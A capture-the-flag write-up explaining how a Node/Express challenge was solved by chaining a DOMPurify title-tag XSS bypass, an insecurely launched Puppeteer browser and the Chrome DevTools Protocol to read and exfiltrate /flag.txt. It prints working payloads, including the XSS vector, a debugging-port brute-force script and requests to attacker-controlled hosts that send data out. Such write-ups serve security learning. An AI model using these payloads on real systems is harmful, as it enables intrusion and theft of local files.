This CTF challenge required exploiting a web application to extract a `flag.txt` file. The solution involved chaining an XSS vulnerability, a Puppeteer instance running with reduced security settings, and the Chrome DevTools Protocol to circumvent the same-origin policy and exfiltrate the flag.

## Challenge Description

The web application was built on Node.js using Express.js and featured an API endpoint that allowed server-side browsing of user-supplied URLs. The server sanitized inputs with DOMPurify and handled different routes for serving content. The `bot.js` script launched Puppeteer with flags that reduced security, presenting an opportunity for exploitation.

### **App.js Analysis**

The **`app.js`** file serves as the backbone of the web application, handling HTTP requests, routing, and rendering views. The analysis of this file revealed several points of interest:

1. **DOM Sanitization with DOMPurify**: The application uses the DOMPurify library to sanitize user input before it is used within the application's views. Specifically, the **`getTitle`** function is designed to clean up the path parameter from the URL and use it as the page title. The relevant code snippet is:

    ```jsx
    const getTitle = (path) => {
        path = decodeURIComponent(path).split("/");
        path = path.slice(-1).toString();
        return DOMPurify.sanitize(path);
    }
    ```

    While DOMPurify is a robust tool for preventing XSS by removing dangerous HTML and JavaScript, its effectiveness depends on the context in which its output is used. In this case, it did not account for the browser's behavior when parsing the **`<title>`** tag, leading to a context-dependent sanitization bypass.

2. **Routing and Static File Serving**: The application utilizes Express.js for routing and serving static files.
    The static file serving is configured with:

    ```jsx
    app.use("/static", express.static(path.join(__dirname, "static")));
    ```

    This is a common pattern in Express.js applications and typically does not present a security issue unless unprotected sensitive files sit within the static directory.

3. **Error Handling**: The application provides custom error handling for 404 (Not Found) errors, which uses the **`getTitle`** function to sanitize the path:

    ```jsx
    app.use((req, res) => {
        res.status(404);
        res.render("404", { title: getTitle(req.path) });
    })
    ```

    The custom error handling demonstrates the good practice of providing user-friendly error messages, but it also highlights the importance of context-aware sanitization: even error pages can be an XSS vector if not handled correctly.

### **Bot.js Analysis**

The **`bot.js`** file is used to simulate a user's browser session via Puppeteer, a Node library which provides a high-level API to control Chrome over the DevTools Protocol. The analysis of this file highlighted a concerning configuration:

1. **Security Flags**: The Puppeteer instance was launched with the following security-reducing flags:

    ```jsx
    const browser = await puppeteer.launch({
        headless: "new",
        ignoreHTTPSErrors: true,
        args: [
            "--no-sandbox",
            "--ignore-certificate-errors",
            "--disable-web-security"
        ],
        executablePath: "/usr/bin/chromium-browser"
    });
    ```

    - **`--no-sandbox`**: Disables the sandbox for all processes. This is a dangerous flag because it allows unrestricted access to system resources and should never be used in a production environment.
    - **`--disable-web-security`**: Disables the same-origin policy. This flag compromises the browser's security model, allowing any page to request data from any other origin, leading to potential data theft or other cross-origin attacks.
    - **`--ignore-certificate-errors`**: Instructs the browser to ignore SSL/TLS certificate errors.
      This could allow the bot to interact with potentially insecure or malicious websites without any warnings.

2. **Headless Browser Control**: The **`goto`** function within **`bot.js`** is responsible for navigating the Puppeteer-controlled browser to a given URL:

    ```jsx
    async function goto(url) {
        // ... Puppeteer launch code ...
        const page = await browser.newPage();
        try {
            await page.goto(url);
        } catch {}
        // ... Browser closing code ...
    }
    ```

    This function navigates to the provided URL without any checks or restrictions on the content that could be loaded, which, combined with the disabled security features, exposes the bot to a range of web-based attacks.

### Dockerfile Analysis

The Dockerfile showed that the challenge ran within a Docker container with a dedicated `challenge` user, and that the flag was copied to `/flag.txt`, making it readable from the local filesystem:

```
[...]
# Create user
adduser -D -u 1000 challenge && \
    echo "challenge:$(head -c 32 /dev/urandom | base64)" | chpasswd;
[...]
COPY ./flag.txt /flag.txt
[...]
```

## Vulnerable Parts

### XSS via `<title>` Tag Manipulation

The web application's sanitization mechanism failed to account for browser behavior concerning the `<title>` tag. When a browser encounters the sequence `</title>` within a `<title>` element, it interprets it as the end of that element. This behavior creates an opportunity for an XSS attack if user input can be manipulated to inject this sequence. The vulnerability was found in the server's response behavior when rendering the title in the `header.ejs` template, where the user-controlled input was not sanitized with this context in mind.

### Insecure Puppeteer Setup

The Puppeteer instance, part of the `bot.js` script, launched a Chromium browser with explicitly disabled security features, namely through the flags `--disable-web-security` and `--no-sandbox`. These settings are highly insecure as they disable the same-origin policy and sandboxing, respectively.
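For contrast, a hardened launch would simply omit these flags. The sketch below shows the corresponding Puppeteer `launch()` options; it is illustrative only and not part of the challenge code:

```jsx
// Illustrative hardened counterpart to the challenge's bot.js launch options.
// Security here comes from what is *omitted*: no --no-sandbox,
// no --disable-web-security, no --ignore-certificate-errors.
const hardenedLaunchOptions = {
    headless: "new",
    ignoreHTTPSErrors: false, // surface TLS errors instead of ignoring them
    args: [],                 // keep sandboxing and the same-origin policy enabled
    executablePath: "/usr/bin/chromium-browser"
};
```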
The same-origin policy is a critical security mechanism that prevents documents or scripts loaded from one origin from interacting with resources from another origin. Disabling it effectively allows any loaded document to request resources from any origin, which is a dangerous setting in a browser controlled by Puppeteer.

The `--no-sandbox` flag also introduces significant vulnerabilities. Sandboxing is a security feature that executes processes in a restricted environment to limit the potential damage from a malicious exploit. By disabling sandboxing, the browser process runs with higher privileges, potentially allowing a malicious script to perform actions on the host system that would otherwise be restricted.

### Chrome DevTools Protocol Access

The Chrome DevTools Protocol (CDP) provides extensive control over a Chrome browser instance, including the ability to inspect, debug, and manipulate web pages and their environment in real time. The challenge's setup did not secure the CDP adequately: the Puppeteer instance ran with a debugging port in a predictable range, which could be brute-forced and then accessed without authentication or origin checks.

In a secure configuration, WebSocket connections to the CDP should only be allowed from trusted origins, and the debugging port should not be exposed unnecessarily. However, in this challenge, neither of these precautions was taken, leaving the CDP wide open for exploitation. This oversight allowed the execution of arbitrary commands in the browser context, which could be used to bypass security restrictions and access local resources.

## Solution

### Step 1: Crafting the XSS Payload

The XSS exploitation hinged on manipulating the `<title>` tag in a way that would bypass DOMPurify.
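Before walking through the payload, it helps to replay the server's path handling in isolation. The sketch below mirrors `getTitle` with the `DOMPurify.sanitize` call omitted, since the bypass targets the `split("/")` step rather than DOMPurify itself:

```jsx
// Mirrors the path handling from the server's getTitle (DOMPurify omitted).
const lastPathSegment = (path) => {
    path = decodeURIComponent(path).split("/");
    return path.slice(-1).toString();
};

// A literal "/" inside the injected markup is destroyed by split("/"):
console.log(lastPathSegment("/%3C/title%3E"));     // → "title>"

// Encoded as the HTML entity "&sol;", the slash survives untouched;
// the browser decodes it only later, when rendering the title:
console.log(lastPathSegment("/%3C&sol;title%3E")); // → "<&sol;title>"
```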
The server's DOMPurify configuration was intended to sanitize inputs to prevent XSS, but it did not account for the context in which the browser would process the title tag. Browsers close the `<title>` element as soon as they encounter a `</title>` sequence, and this behavior could be exploited.

The payload also had to survive the server's decode-and-split logic, which discards everything before the last forward slash:

```jsx
path = decodeURIComponent(path).split("/");
path = path.slice(-1).toString();
```

By encoding the forward slash as the HTML entity `&sol;`, the payload was treated as harmless by DOMPurify but would break out of the title tag when rendered by the browser:

```html
<a href="<&sol;title><img src onerror=XSS>">
```

When the bot visited the page, the rendered document effectively became:

```html
<title><a href="
</title>
<img src onerror=XSS>
```

causing the browser to close the title tag prematurely and treat `<img src onerror=XSS>` as executable HTML, leading to XSS.

The script to be executed by the browser was encoded in Base64 to avoid special-character issues and was decoded and executed by the browser's JavaScript engine upon rendering the XSS payload:

```jsx
const base64Payload = btoa("...JavaScript code...");
const xssVector = `http://localhost:3000/api/report?url=<a href='<&sol;title><img src onerror=eval(atob("${base64Payload}"))>'>`;
```

### Step 2: Initial Chrome DevTools Protocol Attempt

Following the second hint, which pointed to the Chrome DevTools Protocol, the CDP was leveraged for deep interaction with the Chrome browser. The initial approach involved:

1. **Setting Up a Known CDP Port**: Configuring the headless Chrome browser to start with the `--remote-debugging-port=9222` flag.
2. **Accessing the /json Endpoint**: Making an HTTP request to `http://localhost:9222/json`.
3. **WebSocket Connection Attempt**: Attempting to connect to the WebSocket, but facing a `403 Forbidden` error:

    ```
    [ERROR] Rejected an incoming WebSocket connection from the origin.
    ```

This error was traced back to a security control implemented in the **`devtools_http_handler.cc`** file within Chromium's source code. An update made in December 2022 added a check for the **`Origin`** header in WebSocket requests: if the origin was not included in the **`--remote-allow-origins`** flag at the browser's launch, the connection would be rejected. Here's a snippet from the source code showing the security check:

```cpp
void DevToolsHttpHandler::OnWebSocketRequest(
    int connection_id,
    const net::HttpServerRequestInfo& request) {
  if (!thread_)
    return;

  if (request.headers.count("origin") &&
      !remote_allow_origins_.count(request.headers.at("origin")) &&
      !remote_allow_origins_.count("*")) {
    const std::string& origin = request.headers.at("origin");
    const std::string message = base::StringPrintf(
        "Rejected an incoming WebSocket connection from the %s origin. "
        "Use the command line flag --remote-allow-origins=%s to allow "
        "connections from this origin or --remote-allow-origins=* to allow all "
        "origins.",
        origin.c_str(), origin.c_str());
    Send403(connection_id, message);
    LOG(ERROR) << message;
    return;
  }
  // ...
}
```

#### Adjusting Strategy After WebSocket Failure

With the WebSocket approach blocked, focus shifted to alternative methods of interacting with the CDP.

### **Step 3: Utilizing the `/json/new` Endpoint**

With the direct WebSocket connection proving unfeasible due to security restrictions, a different tactic was required. The solution came with the realization that the CDP provides a **`/json/new`** endpoint, which can be used to open a new browser tab with a specified URL via a PUT request.

#### Opening a Local File in a New Tab

To exploit this, a PUT request was sent to the **`/json/new`** endpoint with the file URL of the malicious HTML file.
This operation would instruct the headless browser to open a new tab and load the file from the local filesystem:

```jsx
fetch('http://localhost:9222/json/new?file:///path/to/the/malicious.html', {method: 'PUT'})
```

#### Bypassing the Same-Origin Policy

This step was critical, as it allowed for the execution of JavaScript in a context where the same-origin policy did not apply. Consequently, the malicious script could perform actions that would have been restricted if executed within the context of a page served over HTTP or HTTPS.

#### Impact

By leveraging the **`/json/new`** endpoint in this way, it was possible to sidestep the limitations encountered with the WebSocket connection attempt and proceed with the attack. This endpoint became the new vector for triggering the malicious file execution necessary to complete the challenge.

### Step 4: Downloading and Executing the Malicious HTML File

An HTML file was crafted to perform a `fetch` request for `file:///flag.txt` when executed. The bot was induced to download this file by serving it with a `Content-Disposition: attachment` header. Blocking synchronous `XMLHttpRequest` calls were used to stall execution so the page stayed alive long enough for the download to complete:

```jsx
var link = document.createElement('a');
link.href = 'http://attacker.com/malicious.html';
link.download = 'malicious.html';
link.click();

// Synchronous requests to delay the browser closing
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/?delay', false);
xhr.send();
```

### Step 5: Executing the Attack

Once the file was in the browser's download directory, it was triggered through the Chrome DevTools Protocol.
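The contents of the downloaded file itself are not shown above. A minimal sketch of the script such a `malicious.html` could carry follows; it assumes, per Step 4, that a `file://` page can fetch `file:///flag.txt` under the disabled security settings, and `VPS` is a placeholder for the attacker's host:

```jsx
// Hypothetical script body for the downloaded malicious.html: read the flag
// from the local filesystem and exfiltrate it to the attacker's server.
function buildExfilUrl(flag) {
    return "http://VPS/getflag?flag=" + encodeURIComponent(flag);
}

async function stealFlag() {
    // Readable from a file:// context when Chromium runs with --disable-web-security
    const flag = await fetch("file:///flag.txt").then((r) => r.text());
    await fetch(buildExfilUrl(flag)); // send the flag to the attacker
}
```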
The final script combined brute-forcing the debugging port, downloading the malicious file, and executing the payload that fetched the flag:

```jsx
const totalPorts = 66000 - 30000;
const batches = 5;
const portsPerBatch = totalPorts / batches;

async function checkPort(port) {
    return fetch(`http://localhost:${port}/json/protocol`, { method: 'GET' })
        .then(response => response.ok ? port : Promise.reject(port))
        .catch(() => null);
}

async function bruteforcePorts(start, end) {
    const results = [];
    for (let i = start; i <= end; i += portsPerBatch) {
        const batch = [];
        for (let port = i; port < i + portsPerBatch && port <= end; port++) {
            batch.push(checkPort(port));
        }
        const batchResults = await Promise.all(batch);
        results.push(...batchResults.filter(port => port !== null));
        if (results.length > 0) {
            break;
        }
    }
    return results;
}

async function downloadFileAndBlock(port) {
    // Trigger the download of the malicious HTML file
    var link = document.createElement('a');
    link.href = 'http://VPS/get?file=index.html';
    link.download = 'index.html';
    link.click();

    // Synchronous requests to keep the page alive while the download completes
    var xhr1 = new XMLHttpRequest();
    xhr1.open('GET', 'http://VPS/?delay=1', false);
    xhr1.send();

    var xhr2 = new XMLHttpRequest();
    xhr2.open('GET', 'http://VPS/?delay=2', false);
    xhr2.send();

    // Use the port discovered by bruteforcePorts to open the downloaded file
    fetch(`http://localhost:${port}/json/new?file:///home/challenge/Downloads/index.html`, { method: 'PUT' });

    var xhr3 = new XMLHttpRequest();
    xhr3.open('GET', 'http://VPS/?delay=3', false);
    xhr3.send();
}

(async () => {
    const openPorts = await bruteforcePorts(30000, 66000);

    var xhr4 = new XMLHttpRequest();
    xhr4.open('GET', 'http://VPS/?delay=17', false);
    xhr4.send();

    if (openPorts.length > 0) {
        console.log('Open Ports:', JSON.stringify(openPorts[0]));
        var xhr5 = new XMLHttpRequest();
        xhr5.open('GET', 'http://VPS/getflag?=' + JSON.stringify(openPorts), false);
        xhr5.send();
        downloadFileAndBlock(openPorts[0]);
    } else {
        console.log('none');
    }
})();
```

The final payload was encoded in Base64 and delivered via the crafted XSS vector through the `/api/report` endpoint, which initiated the download and execution of the malicious file, culminating in the flag's exfiltration.
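The delivery step can be sketched as follows. This is an illustration, not the exact exploit code: the host, port, and endpoint follow the examples above, and the payload string is a stand-in for the full port-bruteforce script:

```jsx
// Sketch of assembling the final XSS report URL.
const payload = "fetch('http://VPS/?probe')"; // placeholder for the real script
const base64Payload = Buffer.from(payload).toString("base64"); // btoa() in a browser

// Note: if the Base64 output contains "/", the server's split("/") would
// truncate it after decodeURIComponent; the payload may need padding so
// its Base64 encoding avoids "/".
const xssVector =
    "http://localhost:3000/api/report?url=" +
    encodeURIComponent(
        `<a href='<&sol;title><img src onerror=eval(atob("${base64Payload}"))>'>`
    );

console.log(xssVector);
```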